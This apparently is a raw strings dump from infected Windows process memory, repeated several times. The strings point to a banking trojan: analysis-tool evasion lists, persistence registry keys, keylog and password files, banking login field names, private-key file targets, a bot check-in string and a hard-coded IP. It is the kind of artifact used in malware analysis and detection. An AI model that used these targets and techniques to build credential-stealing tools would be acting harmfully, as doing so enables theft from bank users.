RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

TPAutoConnect.exe_2160_rwx_012E0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_2168_rwx_01150000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

conhost.exe_2168_rwx_014D0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_2560_rwx_005F0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

